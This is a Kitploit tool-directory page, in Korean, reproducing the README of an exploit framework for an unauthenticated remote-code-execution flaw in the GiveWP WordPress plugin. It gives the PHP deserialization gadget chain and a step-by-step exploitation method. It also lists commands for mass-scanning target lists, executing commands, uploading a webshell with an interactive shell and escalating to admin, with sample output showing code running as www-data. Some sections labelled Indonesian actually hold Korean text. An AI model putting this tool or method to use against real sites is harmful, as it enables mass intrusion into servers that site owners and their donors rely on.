Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-82222 — GiveWP WordPress 플러그인의 비인증 RCE인 CVE-2026-82222용 익스플로잇 프레임워크입니다. 대량 스캔, 자동 감지, 멀티스레딩, JSON/TXT 출력 및 승인된 테스트용 인터랙티브 셸을 지원합니다. | Kitploit
도구/GitHubGitHub/ghostlyrootb2h/cve-2026-82222
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration TestingCommand and ControlPayload Development
GitHubghostlyrootb2h/cve-2026-82222

CVE-2026-82222

GiveWP WordPress 플러그인의 비인증 RCE인 CVE-2026-82222용 익스플로잇 프레임워크입니다. 대량 스캔, 자동 감지, 멀티스레딩, JSON/TXT 출력 및 승인된 테스트용 인터랙티브 셸을 지원합니다.

저장소 보기
7시간 38분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚡ GHOSTLYR00T - GiveWP RCE Exploit Framework

Python Version License Author CVE CVSS

CVE-2026-82222 - GiveWP 인증 없는 RCE 익스플로잇
대량 스캐너 + 자동 탐지 + 멀티스레딩 + 인터랙티브 셸


📋 목차 | Table of Contents

  • 개요
  • 주요 기능 | Key Features
  • 취약점 상세 정보
  • 설치 | Installation
  • 전체 파라미터 | Complete Parameters
  • 사용 예시 | Examples
  • 스캔 결과 | Scan Results
  • 작동 원리
  • FAQ
  • 경고 | Warning
  • 라이선스 | License

  • 🎯 개요

    GHOSTLYR00T는 CVE-2026-82222을 위한 익스플로잇 프레임워크로, WordPress GiveWP 플러그인의 PHP 객체 주입 취약점으로 인증 없이 원격 코드 실행(RCE)이 가능합니다. 이 도구는 대량 스캐닝, 자동 탐지, 인터랙티브 셸을 지원합니다.

    🔴 CVSS 9.8 - CRITICAL

    Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H


    🚀 주요 기능 | Key Features

    🇮🇩 인도네시아어

    기능설명
    대량 스캔파일에서 수백 개의 대상 스캔 (-f targets.txt)
    자동 탐지양식 ID, 게이트웨이, 기부 금액 자동 탐지
    멀티스레딩구성 가능한 스레드로 병렬 스캔 (--threads)
    체크 모드익스플로잇 없는 빠른 핑거프린트 (--check)
    JSON 출력결과를 JSON으로 내보내기 (--json)
    TXT 출력결과를 간결한 TXT로 내보내기 (--txt)
    인터랙티브 셸웹셸 업로드 + 인터랙티브 터미널
    관리자 권한 상승사용자를 관리자로 자동 승격
    진행률 표시줄스캔 진행 상황 실시간 모니터링
    컬러 출력전문적인 색상 및 형식의 출력

    🇬🇧 영어

    기능설명
    대량 스캔파일에서 수백 개의 대상 스캔 (-f targets.txt)
    자동 탐지양식 ID, 게이트웨이, 기부 금액 자동 탐지
    멀티스레딩구성 가능한 스레드로 병렬 스캔
    체크 모드익스플로잇 없는 빠른 핑거프린트 (--check)
    JSON 출력결과를 JSON으로 내보내기 (--json)
    TXT 출력결과를 TXT로 내보내기 (--txt)
    인터랙티브 셸웹셸 업로드 + 인터랙티브 터미널
    관리자 권한 상승사용자를 관리자로 자동 승격
    진행률 표시줄실시간 스캔 진행 상황 모니터링
    컬러 출력전문적인 컬러 터미널 출력

    🔍 취약점 상세 정보

    CVE-2026-82222 - GiveWP 인증 없는 RCE

    항목세부 정보
    영향받는 버전GiveWP <= 4.16.7.1
    패치된 버전GiveWP >= 4.16.7.2
    공격 벡터네트워크 (AV:N)
    필요 권한없음 (PR:N)
    영향전체 시스템 장악

    POP 체인:

    root@kitploit:~
    TCPDF::__destruct()
      -> TCPDF::_destroy(true)
        -> foreach ($this->imagekeys as $file)
          -> Symfony Session::getIterator()
            -> Session::getBag($this->attributeName)
              -> $this->storage->getBag($attributeName)
                -> DonationFactory->__call('getBag', [$attributeName])
                  -> call_user_func_array('system', [$attributeName])
    

    📦 설치 | Installation

    🇮🇩 인도네시아어

    🔧 시스템 요구 사항

    • OS: Linux / Windows / MacOS
    • Python: 버전 3.8 이상
    • 라이브러리: requests, urllib3

    📥 설치 단계

    root@kitploit:~
    # 1. 저장소 복제
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. 의존성 설치
    pip install requests urllib3
    
    # 3. 성공 여부 테스트
    python3 poc.py -h
    

    🇬🇧 영어

    🔧 시스템 요구 사항

    • OS: Linux / Windows / MacOS
    • Python: 버전 3.8 이상
    • 라이브러리: requests, urllib3

    📥 설치 단계

    root@kitploit:~
    # 1. 저장소 복제
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. 의존성 설치
    pip install requests urllib3
    
    # 3. 성공 여부 테스트
    python3 poc.py -h
    

    🎯 전체 파라미터 | Complete Parameters

    🇮🇩 인도네시아어

    파라미터기능예시
    -f, --file대상 파일 (배치 모드)-f targets.txt
    --threads스레드 수 (기본값: 4)--threads 10
    --json결과를 JSON으로 내보내기--json hasil.json
    --txt결과를 TXT로 내보내기--txt hasil.txt
    -c, --command실행할 명령어-c "id"
    -g, --gateway특정 게이트웨이 강제 지정-g stripe
    -a, --amount기부 금액 강제 지정-a 25.00
    -t, --triggers재시도 횟수 (기본값: 4)-t 5
    --timeout요청당 타임아웃 (기본값: 30초)--timeout 60
    --check핑거프린트만 수행--check
    --upload-shell웹셸 업로드--upload-shell
    -i, --interactive인터랙티브 터미널-i
    -v, --verbose상세 출력-v
    --no-color컬러 출력 비활성화--no-color

    🇬🇧 영어

    파라미터기능예시
    -f, --file대상 파일 (배치 모드)-f targets.txt
    --threads스레드 수 (기본값: 4)--threads 10
    --json결과를 JSON으로 내보내기--json results.json
    --txt결과를 TXT로 내보내기--txt results.txt
    -c, --command실행할 명령어-c "id"
    -g, --gateway특정 게이트웨이 강제 지정-g stripe
    -a, --amount기부 금액 강제 지정-a 25.00
    -t, --triggers재시도 횟수 (기본값: 4)-t 5
    --timeout요청 타임아웃 (기본값: 30초)--timeout 60
    --check핑거프린트만 수행--check
    --upload-shell웹셸 업로드--upload-shell
    -i, --interactive인터랙티브 터미널-i
    -v, --verbose상세 출력-v
    --no-color컬러 출력 비활성화--no-color

    🔥 사용 예시 | Examples

    🇮🇩 인도네시아어

    1. 단일 대상

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. 배치 스캔 (체크 모드)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt hasil_check.txt
    

    3. 배치 스캔 (익스플로잇 모드)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json hasil.json --txt hasil.txt
    

    4. 인터랙티브 셸

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. 상세 모드

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    🇬🇧 영어

    1. 단일 대상

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. 배치 스캔 (체크 모드)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt check_results.txt
    

    3. 배치 스캔 (익스플로잇 모드)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json results.json --txt results.txt
    

    4. 인터랙티브 셸

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. 상세 모드

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    📊 스캔 결과 | Scan Results

    🇮🇩 인도네시아어

    터미널 출력 (익스플로잇 성공)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.

    TXT 출력 (체크 모드)

    root@kitploit:~
    # GiveWP Vulnerability Scan Results (Fingerprint Mode)
    # Generated: 2026-09-09 12:00:00
    # Total: 10 | Vulnerable: 4 | Exploited: 0 | Failed: 6
    #
    # Format: TARGET | VERSION | STATUS
    #
    https://target1.com | 4.15.4 | VULNERABLE
    https://target2.com | 4.14.6 | VULNERABLE
    

    JSON 출력

    root@kitploit:~
    {
      "timestamp": 1694265600,
      "mode": "exploit",
      "total": 10,
      "vulnerable": 4,
      "exploited": 3,
      "failed": 7,
      "results": [
        {
          "target": "https://target1.com",
          "status": "exploited",
          "version": "4.15.4",
          "command_output": "uid=33(www-data) gid=33(www-data)"
        }
      ]
    }
    

    🇬🇧 영어

    터미널 출력 (익스플로잇 성공)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.


    ⚙️ 작동 원리

    🇮🇩 인도네시아어

    단계별 익스플로잇:

    1. 핑거프린팅: readme.txt 및 give.php를 통해 GiveWP 버전 탐지
    2. 등록: give_action=user_register를 통해 인증 없이 기부자 계정 생성
    3. 페이로드 저장: last_name 메타데이터에 직렬화된 PHP 객체 저장
    4. 폼 탐색: REST API 및 스크래핑을 통해 기부 폼 발견
    5. 게이트웨이/금액 자동 탐지: 성공할 때까지 게이트웨이 및 금액 조합 테스트
    6. 세션 포이즈닝: 역직렬화를 트리거하기 위해 give_last 필드 없이 기부 전송
    7. 트리거 및 캡처: 세션에 접근하여 페이로드를 활성화하고 출력 캡처

    자동 탐지 로직:

    root@kitploit:~
    # Gateway detection order
    CANDIDATE_GATEWAYS = ['manual', 'offline', 'paypal', 'stripe', 'square',
                          'paypalexpress', 'authorize', 'razorpay', 'mollie']
    

    Amount detection order

    AMOUNT_TESTS = ['0.01', '1.00', '5.00', '10.00', '25.00', '50.00', '100.00', '250.00', '500.00']

    🇬🇧 English

    Step-by-step Exploitation:

    1. Fingerprint: Detects GiveWP version via readme.txt and give.php
    2. Registration: Creates donor account via give_action=user_register
    3. Payload Storage: Stores serialized PHP object in last_name metadata
    4. Form Discovery: Finds donation forms via REST API and scraping
    5. Gateway/Amount Auto-Detection: Tests combinations until successful
    6. Session Poisoning: Submits donation without give_last to trigger deserialization
    7. Trigger & Capture: Accesses session to revive payload and capture output

    ❓ FAQ

    🇮🇩 Bahasa Indonesia

    PertanyaanJawaban
    Versi GiveWP apa yang rentan?GiveWP <= 4.16.7.1. Versi 4.16.7.2 dan di atasnya sudah patched.
    Kenapa harus -a 25?Beberapa form punya minimum amount (misal $25). Tools auto-detect, tapi bisa di-force.
    Bisa digunakan di production?TIDAK. Hanya untuk authorized testing.
    Kenapa registrasi gagal (HTTP 200)?Target mungkin registrasi dimatikan, WAF aktif, atau versi 4.16.6+.

    🇬🇧 English

    QuestionAnswer
    Which GiveWP versions are vulnerable?GiveWP <= 4.16.7.1. Version 4.16.7.2 and above are patched.
    Why use -a 25?Some forms have minimum amounts. Tool auto-detects, but can be forced.
    Can this be used in production?NO. For authorized testing only.
    Why registration fails (HTTP 200)?Target may have registration disabled, WAF active, or version 4.16.6+.

    ⚠️ Peringatan | Warning

    ⚠️ PERINGATAN HUKUM ⚠️

    TOOLS INI HANYA UNTUK PENELITIAN KEAMANAN!


    ⚠️ Ilegal: Mengakses server tanpa izin = tindak pidana
    ⚠️ UU ITE: Melanggar Pasal 30-32 tentang akses ilegal
    ⚠️ Hanya untuk: Pengujian sistem sendiri atau dengan izin tertulis
    ⚠️ Tanggung Jawab: Pengguna bertanggung jawab penuh atas penggunaan tools ini

    GUNAKAN DENGAN BIJAK DAN BERTANGGUNG JAWAB!

    ⚠️ LEGAL WARNING ⚠️

    THIS TOOL IS FOR SECURITY RESEARCH ONLY!


    ⚠️ Illegal: Accessing servers without permission = criminal offense
    ⚠️ Legal Risk: Violates computer fraud laws
    ⚠️ Authorized use only: Testing your own systems or with written permission
    ⚠️ Responsibility: Users are fully responsible for their use of this tool

    USE WISELY AND RESPONSIBLY!


    📜 Lisensi | License

    🇮🇩 Bahasa Indonesia

    Copyright © 2026 GhostlyrootB2H
    Didistribusikan di bawah lisensi MIT.

    🇬🇧 English

    Copyright © 2026 GhostlyrootB2H
    Distributed under the MIT License.


    👨‍💻 Author

    GhostlyrootB2H

    🐙 GitHub: @GhostlyrootB2H

    🇮🇩 Terima kasih telah menggunakan GHOSTLYR00T!
    Tools ini untuk pembelajaran dan pengujian keamanan.
    Jangan gunakan untuk aktivitas ilegal!

    🇬🇧 Thank you for using GHOSTLYR00T!
    For learning and security testing only.
    Do not use for illegal activities!

    도구 다운로드